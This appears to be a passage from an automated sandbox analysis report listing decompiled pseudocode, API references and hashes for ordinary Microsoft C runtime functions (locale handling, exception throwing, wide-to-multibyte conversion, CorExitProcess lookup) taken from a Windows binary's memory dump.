                    						E013CB190(_t89);
                    						E013F4EC6( &_v100, 0x1430adc);
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_t166 = _t170;
                    						_t94 =  *0x1435234; // 0x78d9f939
                    						_t95 = _t94 ^ _t166;
                    						_v480 = _t95;
                    						 *[fs:0x0] =  &_v476;
                    						_t163 =  &_v100;
                    						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t163 + 0x14))))(_v456, _t95, _t162,  *[fs:0x0], E01416828, 0xffffffff, _t165);
                    						if(__eflags == 0) {
                    							_t102 =  *((intOrPtr*)( *_t163 + 0x34))();
                    							_t103 =  *((intOrPtr*)( *_t102 + 8))( &_v88);
                    							_v12 = 0;
                    							E013CB230( &_v64, __eflags, _t103, _v0);
                    							_t99 = E013F4EC6( &_v64, 0x14315c4);
                    						}
                    						 *[fs:0x0] = _v20;
                    						__eflags = _v24 ^ _t166;
                    						return E013F268B(_t99, _v24 ^ _t166);
                    					}
                    				} else {
                    					_t126 =  *((intOrPtr*)(_t67 + 0x20))();
                    					L2:
                    					 *[fs:0x0] = _v16;
                    					return E013F268B(_t126, _v20 ^ _t165);
                    				}
                    			}































































                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CD018
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                    • API String ID: 2005118841-1273958906
                    • Opcode ID: fc9c426722f5ced5194d0ec0939aa6320d1aa15b47677f652a842c8091067253
                    • Instruction ID: 2ded6ae9911901fcf7499359665a2ce9fe2e46d915cac2c8a1d85db65cc4bb83
                    • Opcode Fuzzy Hash: fc9c426722f5ced5194d0ec0939aa6320d1aa15b47677f652a842c8091067253
                    • Instruction Fuzzy Hash: 2E519175A00359EFDB11EBA8CC48FDEBBBCAF19704F104599E549E3241DB749E448BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E013C361A(intOrPtr __ecx, void* __edx, void* __edi) {
                    				intOrPtr _t32;
                    				void* _t36;
                    				void* _t37;
                    				intOrPtr _t38;
                    				void* _t39;
                    
                    				_t37 = __edi;
                    				_t36 = __edx;
                    				_t32 = __ecx;
                    				_push(0x10);
                    				E013F26C2(E0141594E);
                    				_t38 = _t32;
                    				 *((intOrPtr*)(_t39 - 0x10)) = _t38;
                    				E013F0E3A(_t32, 0);
                    				 *((intOrPtr*)(_t39 - 4)) = 0;
                    				 *((intOrPtr*)(_t38 + 4)) = 0;
                    				 *((char*)(_t38 + 8)) = 0;
                    				 *((intOrPtr*)(_t38 + 0xc)) = 0;
                    				 *((char*)(_t38 + 0x10)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x14)) = 0;
                    				 *((short*)(_t38 + 0x18)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x1c)) = 0;
                    				 *((short*)(_t38 + 0x20)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x24)) = 0;
                    				 *((char*)(_t38 + 0x28)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x2c)) = 0;
                    				 *((char*)(_t38 + 0x30)) = 0;
                    				 *((char*)(_t39 - 4)) = 6;
                    				if( *((intOrPtr*)(_t39 + 8)) == 0) {
                    					E013C3761(_t39 - 0x1c, "bad locale name");
                    					 *((intOrPtr*)(_t39 - 0x1c)) = 0x141a830;
                    					E013F4EC6(_t39 - 0x1c, 0x14309cc);
                    				}
                    				E013F14F1(0, _t36, _t37, _t38,  *((intOrPtr*)(_t39 + 8)));
                    				return E013F269C(_t38);
                    			}









                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C3621
                    • std::_Lockit::_Lockit.LIBCPMT ref: 013C362E
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013C368D
                      • Part of subcall function 013C3761: ___std_exception_copy.LIBVCRUNTIME ref: 013C3793
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C3684
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: std::_$ExceptionException@8H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow___std_exception_copy
                    • String ID: bad locale name
                    • API String ID: 3907016102-1405518554
                    • Opcode ID: dccc6ee42ae5d6cd0421d2276d98e78536abf73e2d079afb7804b72397ae0ab2
                    • Instruction ID: 72c762cd8f511ea0149a37d36e8d4f0a29b49d9cad3b734c8762b9ecc7fd4b53
                    • Opcode Fuzzy Hash: dccc6ee42ae5d6cd0421d2276d98e78536abf73e2d079afb7804b72397ae0ab2
                    • Instruction Fuzzy Hash: F5015EB0905B45DEC721DF7E848058BFFF0BF28614B508A2FE58A93610D770A605CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E01403507(void* __ecx, intOrPtr _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				void* __ebp;
                    				signed int _t10;
                    				intOrPtr* _t20;
                    				signed int _t22;
                    
                    				_t10 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t10 ^ _t22;
                    				_v12 = _v12 & 0x00000000;
                    				_t12 =  &_v12;
                    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                    				if(_t12 != 0) {
                    					_t20 = GetProcAddress(_v12, "CorExitProcess");
                    					if(_t20 != 0) {
                    						 *0x141a1a8(_a4);
                    						_t12 =  *_t20();
                    					}
                    				}
                    				if(_v12 != 0) {
                    					_t12 = FreeLibrary(_v12);
                    				}
                    				return E013F268B(_t12, _v8 ^ _t22);
                    			}










                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,014034FC,?,?,0140349C,?), ref: 01403527
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,014034FC,?,?,0140349C,?), ref: 0140353A
                    • FreeLibrary.KERNEL32(00000000,?,?,?,014034FC,?,?,0140349C,?), ref: 0140355D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: a7bdb9d358bb0a912ec54ac19f10df619f466d188af179aa2ae3cd7bdfb9cb3d
                    • Instruction ID: 6f6bc84df467040e64bc324080a30016c3788b7b36d8802aca81aa2628db7e0f
                    • Opcode Fuzzy Hash: a7bdb9d358bb0a912ec54ac19f10df619f466d188af179aa2ae3cd7bdfb9cb3d
                    • Instruction Fuzzy Hash: 23F06831A01118BFDB219F59E909B9EBFB8FF08755F100069F905A7270CB759A40CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E013FF5BB(void* __edx, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				char _v16;
                    				int _v20;
                    				int _v24;
                    				char* _v28;
                    				int _v32;
                    				char _v36;
                    				intOrPtr _v44;
                    				char _v48;
                    				void* __ebx;
                    				void* __ebp;
                    				signed int _t59;
                    				char* _t61;
                    				intOrPtr _t63;
                    				int _t64;
                    				intOrPtr* _t65;
                    				signed int _t66;
                    				signed int _t68;
                    				intOrPtr* _t71;
                    				short* _t73;
                    				int _t74;
                    				int _t76;
                    				char _t78;
                    				short* _t83;
                    				short _t85;
                    				int _t88;
                    				int _t90;
                    				char* _t95;
                    				int _t100;
                    				char* _t102;
                    				void* _t103;
                    				intOrPtr _t105;
                    				intOrPtr _t106;
                    				int _t107;
                    				short* _t109;
                    				int _t110;
                    				int _t111;
                    				signed int _t112;
                    
                    				_t103 = __edx;
                    				_t59 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t59 ^ _t112;
                    				_t61 = _a4;
                    				_t88 = _a12;
                    				_t111 = 0;
                    				_v28 = _t61;
                    				_v20 = 0;
                    				_t109 = _a8;
                    				_v24 = _t109;
                    				if(_t61 == 0 || _t88 != 0) {
                    					if(_t109 != 0) {
                    						E013FEF21(_t88,  &_v48, _t103, _a16);
                    						_t95 = _v28;
                    						if(_t95 == 0) {
                    							_t63 = _v44;
                    							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
                    								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
                    								if(_t64 == 0 || _v20 != _t111) {
                    									L55:
                    									_t65 = E013FDB3A();
                    									_t110 = _t109 | 0xffffffff;
                    									 *_t65 = 0x2a;
                    									goto L56;
                    								} else {
                    									_t53 = _t64 - 1; // -1
                    									_t110 = _t53;
                    									L56:
                    									if(_v36 != 0) {
                    										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                    									}
                    									_t66 = _t110;
                    									goto L59;
                    								}
                    							}
                    							_t68 =  *_t109 & 0x0000ffff;
                    							if(_t68 == 0) {
                    								L51:
                    								_t110 = _t111;
                    								goto L56;
                    							}
                    							while(_t68 <= 0xff) {
                    								_t109 =  &(_t109[1]);
                    								_t111 = _t111 + 1;
                    								_t68 =  *_t109 & 0x0000ffff;
                    								if(_t68 != 0) {
                    									continue;
                    								}
                    								goto L51;
                    							}
                    							goto L55;
                    						}
                    						_t105 = _v44;
                    						if( *((intOrPtr*)(_t105 + 0xa8)) != _t111) {
                    							if( *((intOrPtr*)(_t105 + 4)) != 1) {
                    								_t110 = WideCharToMultiByte( *(_t105 + 8), _t111, _t109, 0xffffffff, _t95, _t88, _t111,  &_v20);
                    								if(_t110 == 0) {
                    									if(_v20 != _t111 || GetLastError() != 0x7a) {
                    										L45:
                    										_t71 = E013FDB3A();
                    										_t111 = _t111 | 0xffffffff;
                    										 *_t71 = 0x2a;
                    										goto L51;
                    									} else {
                    										if(_t88 == 0) {
                    											goto L56;
                    										}
                    										_t73 = _v24;
                    										while(1) {
                    											_t106 = _v44;
                    											_t100 =  *(_t106 + 4);
                    											if(_t100 > 5) {
                    												_t100 = 5;
                    											}
                    											_t74 = WideCharToMultiByte( *(_t106 + 8), _t111, _t73, 1,  &_v16, _t100, _t111,  &_v20);
                    											_t90 = _a12;
                    											_t107 = _t74;
                    											if(_t107 == 0 || _v20 != _t111 || _t107 < 0 || _t107 > 5) {
                    												goto L55;
                    											}
                    											if(_t107 + _t110 > _t90) {
                    												goto L56;
                    											}
                    											_t76 = _t111;
                    											_v32 = _t76;
                    											if(_t107 <= 0) {
                    												L43:
                    												_t73 = _v24 + 2;
                    												_v24 = _t73;
                    												if(_t110 < _t90) {
                    													continue;
                    												}
                    												goto L56;
                    											}
                    											_t102 = _v28;
                    											while(1) {
                    												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
                    												 *((char*)(_t102 + _t110)) = _t78;
                    												if(_t78 == 0) {
                    													goto L56;
                    												}
                    												_t76 = _v32 + 1;
                    												_t110 = _t110 + 1;
                    												_v32 = _t76;
                    												if(_t76 < _t107) {
                    													continue;
                    												}
                    												goto L43;
                    											}
                    											goto L56;
                    										}
                    										goto L55;
                    									}
                    								}
                    								if(_v20 != _t111) {
                    									goto L45;
                    								}
                    								_t28 = _t110 - 1; // -1
                    								_t111 = _t28;
                    								goto L51;
                    							}
                    							if(_t88 == 0) {
                    								L21:
                    								_t111 = WideCharToMultiByte( *(_t105 + 8), _t111, _t109, _t88, _t95, _t88, _t111,  &_v20);
                    								if(_t111 == 0 || _v20 != 0) {
                    									goto L45;
                    								} else {
                    									if(_v28[_t111 - 1] == 0) {
                    										_t111 = _t111 - 1;
                    									}
                    									goto L51;
                    								}
                    							}
                    							_t83 = _t109;
                    							_v24 = _t88;
                    							while( *_t83 != _t111) {
                    								_t83 =  &(_t83[1]);
                    								_t16 =  &_v24;
                    								 *_t16 = _v24 - 1;
                    								if( *_t16 != 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							if(_v24 != _t111 &&  *_t83 == _t111) {
                    								_t88 = (_t83 - _t109 >> 1) + 1;
                    							}
                    							goto L21;
                    						}
                    						if(_t88 == 0) {
                    							goto L51;
                    						}
                    						while( *_t109 <= 0xff) {
                    							_t95[_t111] =  *_t109;
                    							_t85 =  *_t109;
                    							_t109 =  &(_t109[1]);
                    							if(_t85 == 0) {
                    								goto L51;
                    							}
                    							_t111 = _t111 + 1;
                    							if(_t111 < _t88) {
                    								continue;
                    							}
                    							goto L51;
                    						}
                    						goto L45;
                    					}
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					_t66 = E013FDA61() | 0xffffffff;
                    					goto L59;
                    				} else {
                    					_t66 = 0;
                    					L59:
                    					return E013F268B(_t66, _v8 ^ _t112);
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8c0f58e49ae88e6c4bf10bcbc3b199e21f5dd637fd023b70486c06bb7b135ab
                    • Instruction ID: 005793eaaf57385fc07be0686721fcb9da19095bf98f443f1a250e040e75b7e5
                    • Opcode Fuzzy Hash: d8c0f58e49ae88e6c4bf10bcbc3b199e21f5dd637fd023b70486c06bb7b135ab
                    • Instruction Fuzzy Hash: 3C71923690025A9BDB218FA8C844ABEBF7DEF4536CF14422DEF11E7161DB709945CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E01405366(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v36;
                    				signed int _v40;
                    				intOrPtr _v44;
                    				signed int _v56;
                    				char _v276;
                    				short _v278;
                    				short _v280;
                    				char _v448;
                    				signed int _v452;
                    				signed int _v456;
                    				short _v458;
                    				intOrPtr _v460;
                    				intOrPtr _v464;
                    				signed int _v468;
                    				signed int _v472;
                    				intOrPtr _v508;
                    				char _v536;
                    				signed int _v540;
                    				intOrPtr _v544;
                    				signed int _v556;
                    				char _v708;
                    				signed int _v712;
                    				signed int _v716;
                    				short _v718;
                    				signed int* _v720;
                    				signed int _v724;
                    				signed int _v728;
                    				intOrPtr _v732;
                    				signed int* _v736;
                    				signed int _v740;
                    				signed int _v744;
                    				signed int _v748;
                    				signed int _v752;
                    				char _v820;
                    				char _v1248;
                    				char _v1256;
                    				intOrPtr _v1276;
                    				signed int _v1292;
                    				signed int _t241;
                    				void* _t244;
                    				signed int _t247;
                    				signed int _t249;
                    				signed int _t254;
                    				signed int _t255;
                    				signed int _t256;
                    				signed int _t257;
                    				signed int _t258;
                    				signed int _t259;
                    				void* _t261;
                    				signed int _t262;
                    				signed int _t263;
                    				signed int _t264;
                    				signed int _t266;
                    				signed int _t269;
                    				signed int _t276;
                    				signed int _t277;
                    				signed int _t278;
                    				intOrPtr _t279;
                    				signed int _t282;
                    				signed int _t283;
                    				signed int _t286;
                    				signed int _t287;
                    				intOrPtr _t289;
                    				signed int _t292;
                    				signed int _t293;
                    				signed int _t295;
                    				signed int _t296;
                    				signed int _t314;
                    				signed int _t315;
                    				signed int _t318;
                    				signed int _t323;
                    				void* _t324;
                    				signed int _t326;
                    				void* _t327;
                    				intOrPtr _t328;
                    				signed int _t332;
                    				signed int _t333;
                    				intOrPtr* _t336;
                    				signed int _t350;
                    				signed int _t352;
                    				signed int _t354;
                    				intOrPtr* _t355;
                    				signed int _t357;
                    				signed int _t363;
                    				intOrPtr* _t367;
                    				intOrPtr* _t370;
                    				void* _t373;
                    				signed int _t374;
                    				intOrPtr* _t375;
                    				signed int _t386;
                    				intOrPtr _t389;
                    				intOrPtr* _t390;
                    				signed int _t392;
                    				signed int* _t396;
                    				intOrPtr* _t403;
                    				intOrPtr* _t404;
                    				intOrPtr _t413;
                    				signed int _t414;
                    				short _t415;
                    				signed int _t416;
                    				void* _t417;
                    				signed int _t418;
                    				signed int _t420;
                    				intOrPtr _t421;
                    				signed int _t424;
                    				intOrPtr _t425;
                    				signed int _t427;
                    				signed int _t430;
                    				intOrPtr _t436;
                    				signed int _t437;
                    				signed int _t439;
                    				signed int _t440;
                    				signed int _t443;
                    				signed int _t445;
                    				signed int _t449;
                    				signed int* _t450;
                    				intOrPtr* _t451;
                    				short _t452;
                    				void* _t454;
                    				signed int _t456;
                    				signed int _t458;
                    				void* _t460;
                    				void* _t461;
                    				void* _t463;
                    				signed int _t464;
                    				void* _t465;
                    				void* _t467;
                    				signed int _t468;
                    				void* _t470;
                    				void* _t472;
                    				intOrPtr _t484;
                    
                    				_t413 = __edx;
                    				_t454 = _t460;
                    				_t461 = _t460 - 0xc;
                    				_push(__ebx);
                    				_push(__esi);
                    				_v12 = 1;
                    				_t350 = E0140131B(__ecx, 0x6a6);
                    				_t240 = 0;
                    				_pop(_t363);
                    				if(_t350 == 0) {
                    					L20:
                    					return _t240;
                    				} else {
                    					_push(__edi);
                    					_t2 = _t350 + 4; // 0x4
                    					_t420 = _t2;
                    					 *_t420 = 0;
                    					 *_t350 = 1;
                    					_t436 = _a4;
                    					_t4 = _t436 + 0x30; // 0x1404b65
                    					_t241 = _t4;
                    					_push( *_t241);
                    					_v16 = _t241;
                    					_push(0x1423c9c);
                    					_push( *0x1423b54);
                    					E014052A5(_t350, _t363, _t420, _t436, _t420, 0x351, 3);
                    					_t463 = _t461 + 0x18;
                    					_v8 = 0x1423b54;
                    					while(1) {
                    						L2:
                    						_t244 = E013FF0CF(_t420, 0x351, 0x1423c98);
                    						_t464 = _t463 + 0xc;
                    						if(_t244 != 0) {
                    							break;
                    						} else {
                    							_t8 = _v16 + 0x10; // 0x10
                    							_t403 = _t8;
                    							_t332 =  *_v16;
                    							_v16 = _t403;
                    							_t404 =  *_t403;
                    							goto L4;
                    						}
                    						while(1) {
                    							L4:
                    							_t413 =  *_t332;
                    							if(_t413 !=  *_t404) {
                    								break;
                    							}
                    							if(_t413 == 0) {
                    								L8:
                    								_t333 = 0;
                    							} else {
                    								_t413 =  *((intOrPtr*)(_t332 + 2));
                    								if(_t413 !=  *((intOrPtr*)(_t404 + 2))) {
                    									break;
                    								} else {
                    									_t332 = _t332 + 4;
                    									_t404 = _t404 + 4;
                    									if(_t413 != 0) {
                    										continue;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							L10:
                    							asm("sbb eax, eax");
                    							_t363 = _v8 + 0xc;
                    							_v8 = _t363;
                    							_v12 = _v12 &  !( ~_t333);
                    							_t336 = _v16;
                    							_v16 = _t336;
                    							_push( *_t336);
                    							_push(0x1423c9c);
                    							_push( *_t363);
                    							E014052A5(_t350, _t363, _t420, _t436, _t420, 0x351, 3);
                    							_t463 = _t464 + 0x18;
                    							if(_v8 < 0x1423b84) {
                    								goto L2;
                    							} else {
                    								if(_v12 != 0) {
                    									E014012E1(_t350);
                    									_t31 = _t436 + 0x28; // 0x30ff068b
                    									_t427 = _t420 | 0xffffffff;
                    									__eflags =  *_t31;
                    									if(__eflags != 0) {
                    										asm("lock xadd [ecx], eax");
                    										if(__eflags == 0) {
                    											_t32 = _t436 + 0x28; // 0x30ff068b
                    											E014012E1( *_t32);
                    										}
                    									}
                    									_t33 = _t436 + 0x24; // 0x30ff0c46
                    									__eflags =  *_t33;
                    									if( *_t33 != 0) {
                    										asm("lock xadd [eax], edi");
                    										__eflags = _t427 == 1;
                    										if(_t427 == 1) {
                    											_t34 = _t436 + 0x24; // 0x30ff0c46
                    											E014012E1( *_t34);
                    										}
                    									}
                    									 *(_t436 + 0x24) = 0;
                    									 *(_t436 + 0x1c) = 0;
                    									 *(_t436 + 0x28) = 0;
                    									 *((intOrPtr*)(_t436 + 0x20)) = 0;
                    									_t39 = _t436 + 0x40; // 0x10468b00
                    									_t240 =  *_t39;
                    								} else {
                    									_t20 = _t436 + 0x28; // 0x30ff068b
                    									_t430 = _t420 | 0xffffffff;
                    									_t484 =  *_t20;
                    									if(_t484 != 0) {
                    										asm("lock xadd [ecx], eax");
                    										if(_t484 == 0) {
                    											_t21 = _t436 + 0x28; // 0x30ff068b
                    											E014012E1( *_t21);
                    										}
                    									}
                    									_t22 = _t436 + 0x24; // 0x30ff0c46
                    									if( *_t22 != 0) {
                    										asm("lock xadd [eax], edi");
                    										if(_t430 == 1) {
                    											_t23 = _t436 + 0x24; // 0x30ff0c46
                    											E014012E1( *_t23);
                    										}
                    									}
                    									 *(_t436 + 0x24) =  *(_t436 + 0x24) & 0x00000000;
                    									_t26 = _t350 + 4; // 0x4
                    									_t240 = _t26;
                    									 *(_t436 + 0x1c) =  *(_t436 + 0x1c) & 0x00000000;
                    									 *(_t436 + 0x28) = _t350;
                    									 *((intOrPtr*)(_t436 + 0x20)) = _t240;
                    								}
                    								goto L20;
                    							}
                    							goto L130;
                    						}
                    						asm("sbb eax, eax");
                    						_t333 = _t332 | 0x00000001;
                    						__eflags = _t333;
                    						goto L10;
                    					}
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E013FDA8E();
                    					asm("int3");
                    					_push(_t454);
                    					_t456 = _t464;
                    					_t465 = _t464 - 0x1d0;
                    					_t247 =  *0x1435234; // 0x78d9f939
                    					_v56 = _t247 ^ _t456;
                    					_t249 = _v40;
                    					_push(_t350);
                    					_push(_t436);
                    					_t437 = _v36;
                    					_push(_t420);
                    					_t421 = _v44;
                    					_v508 = _t421;
                    					__eflags = _t249;
                    					if(_t249 == 0) {
                    						_v456 = 1;
                    						_v468 = 0;
                    						_t352 = 0;
                    						_v452 = 0;
                    						__eflags = _t437;
                    						if(__eflags == 0) {
                    							L79:
                    							_t249 = E01405366(_t352, _t363, _t413, _t421, _t437, __eflags, _t421);
                    							goto L80;
                    						} else {
                    							__eflags =  *_t437 - 0x4c;
                    							if( *_t437 != 0x4c) {
                    								L58:
                    								_push(0);
                    								_t249 = E01404F2E(_t352, _t413, _t421, _t437, _t437,  &_v276, 0x83,  &_v448, 0x55);
                    								_t467 = _t465 + 0x18;
                    								__eflags = _t249;
                    								if(_t249 != 0) {
                    									_t363 = 0;
                    									__eflags = 0;
                    									_t76 = _t421 + 0x20; // 0x1404b55
                    									_t414 = _t76;
                    									_t439 = 0;
                    									_v452 = _t414;
                    									do {
                    										__eflags = _t439;
                    										if(_t439 == 0) {
                    											L73:
                    											_t254 = _v456;
                    										} else {
                    											_t367 =  *_t414;
                    											_t255 =  &_v276;
                    											while(1) {
                    												__eflags =  *_t255 -  *_t367;
                    												_t421 = _v464;
                    												if( *_t255 !=  *_t367) {
                    													break;
                    												}
                    												__eflags =  *_t255;
                    												if( *_t255 == 0) {
                    													L66:
                    													_t363 = 0;
                    													_t256 = 0;
                    												} else {
                    													_t415 =  *((intOrPtr*)(_t255 + 2));
                    													__eflags = _t415 -  *((intOrPtr*)(_t367 + 2));
                    													_v458 = _t415;
                    													_t414 = _v452;
                    													if(_t415 !=  *((intOrPtr*)(_t367 + 2))) {
                    														break;
                    													} else {
                    														_t255 = _t255 + 4;
                    														_t367 = _t367 + 4;
                    														__eflags = _v458;
                    														if(_v458 != 0) {
                    															continue;
                    														} else {
                    															goto L66;
                    														}
                    													}
                    												}
                    												L68:
                    												__eflags = _t256;
                    												if(_t256 == 0) {
                    													_t352 = _t352 + 1;
                    													__eflags = _t352;
                    													goto L73;
                    												} else {
                    													_t257 =  &_v276;
                    													_push(_t257);
                    													_push(_t439);
                    													_push(_t421);
                    													L83();
                    													_t414 = _v452;
                    													_t467 = _t467 + 0xc;
                    													__eflags = _t257;
                    													if(_t257 == 0) {
                    														_t363 = 0;
                    														_t254 = 0;
                    														_v456 = 0;
                    													} else {
                    														_t352 = _t352 + 1;
                    														_t363 = 0;
                    														goto L73;
                    													}
                    												}
                    												goto L74;
                    											}
                    											asm("sbb eax, eax");
                    											_t256 = _t255 | 0x00000001;
                    											_t363 = 0;
                    											__eflags = 0;
                    											goto L68;
                    										}
                    										L74:
                    										_t439 = _t439 + 1;
                    										_t414 = _t414 + 0x10;
                    										_v452 = _t414;
                    										__eflags = _t439 - 5;
                    									} while (_t439 <= 5);
                    									__eflags = _t254;
                    									if(__eflags != 0) {
                    										goto L79;
                    									} else {
                    										__eflags = _t352;
                    										goto L77;
                    									}
                    								}
                    								goto L80;
                    							} else {
                    								__eflags =  *(_t437 + 2) - 0x43;
                    								if( *(_t437 + 2) != 0x43) {
                    									goto L58;
                    								} else {
                    									__eflags =  *((short*)(_t437 + 4)) - 0x5f;
                    									if( *((short*)(_t437 + 4)) != 0x5f) {
                    										goto L58;
                    									} else {
                    										while(1) {
                    											_t258 = E0140E9DF(_t437, 0x1423c90);
                    											_t354 = _t258;
                    											_v472 = _t354;
                    											_pop(_t369);
                    											__eflags = _t354;
                    											if(_t354 == 0) {
                    												break;
                    											}
                    											_t259 = _t258 - _t437;
                    											__eflags = _t259;
                    											_v456 = _t259 >> 1;
                    											if(_t259 == 0) {
                    												break;
                    											} else {
                    												_t261 = 0x3b;
                    												__eflags =  *_t354 - _t261;
                    												if( *_t354 == _t261) {
                    													break;
                    												} else {
                    													_t424 = _v456;
                    													_t355 = 0x1423b54;
                    													_v460 = 1;
                    													do {
                    														_t262 = E0140E9A5( *_t355, _t437, _t424);
                    														_t465 = _t465 + 0xc;
                    														__eflags = _t262;
                    														if(_t262 != 0) {
                    															goto L45;
                    														} else {
                    															_t370 =  *_t355;
                    															_t413 = _t370 + 2;
                    															do {
                    																_t328 =  *_t370;
                    																_t370 = _t370 + 2;
                    																__eflags = _t328 - _v468;
                    															} while (_t328 != _v468);
                    															_t369 = _t370 - _t413 >> 1;
                    															__eflags = _t424 - _t370 - _t413 >> 1;
                    															if(_t424 != _t370 - _t413 >> 1) {
                    																goto L45;
                    															}
                    														}
                    														break;
                    														L45:
                    														_v460 = _v460 + 1;
                    														_t355 = _t355 + 0xc;
                    														__eflags = _t355 - 0x1423b84;
                    													} while (_t355 <= 0x1423b84);
                    													_t352 = _v472 + 2;
                    													_t263 = E0140E955(_t369, _t352, 0x1423c98);
                    													_t421 = _v464;
                    													_t440 = _t263;
                    													_pop(_t373);
                    													__eflags = _t440;
                    													if(_t440 != 0) {
                    														L48:
                    														__eflags = _v460 - 5;
                    														if(_v460 > 5) {
                    															_t264 = _v452;
                    															goto L54;
                    														} else {
                    															_push(_t440);
                    															_t266 = E0140D9C1(_t373,  &_v276, 0x83, _t352);
                    															_t468 = _t465 + 0x10;
                    															__eflags = _t266;
                    															if(_t266 != 0) {
                    																L82:
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																E013FDA8E();
                    																asm("int3");
                    																_push(_t456);
                    																_t458 = _t468;
                    																_t269 =  *0x1435234; // 0x78d9f939
                    																_v556 = _t269 ^ _t458;
                    																_push(_t352);
                    																_t357 = _v540;
                    																_push(_t440);
                    																_push(_t421);
                    																_t425 = _v544;
                    																_v1292 = _t357;
